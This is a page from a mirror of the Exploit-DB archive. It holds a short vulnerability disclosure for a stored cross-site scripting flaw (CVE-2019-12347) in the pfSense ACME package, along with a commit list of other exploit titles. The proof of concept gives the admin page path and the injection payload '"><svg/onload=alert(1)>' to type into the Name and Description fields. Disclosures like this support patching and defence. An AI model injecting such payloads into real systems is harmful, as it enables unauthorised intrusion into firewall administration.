bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46936.txt
Offensive Security 0a2b5fd16f DB: 2019-05-30 
7 changes to exploits/shellcodes

Free SMTP Server 2.5 - Denial of Service (PoC)
Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script
Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL

Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)

Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)

pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting
2019-05-30 05:01:56 +00:00

21 lines
No EOL
1.3 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: pfSense 2.4.4-p3 (ACMEPackage 0.5.7_1) - Stored Cross-Site Scripting
# Date: 05.28.2019
# Exploit Author: Chi Tran
# Vendor Homepage: https://www.pfsense.org
# Version: 2.4.4-p3/0.5.7_1
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-12347
##################################################################################################################################
Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface.
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.
The ACME Package for pfSense interfaces with Lets Encrypt to handle the certificate generation, validation, and renewal processes. (https://docs.netgate.com/pfsense/en/latest/certificates/acme-package.html)
#################################################################################
Proof of Concepts:
1 - Navigate to https://192.168.1.1/acme/acme_accountkeys_edit.php
2 - In the "Name" and "Description" field, input payload: "><svg/onload=alert(1)>
3 - XSS box will then pop-up
Reference in a new issue View git blame Copy permalink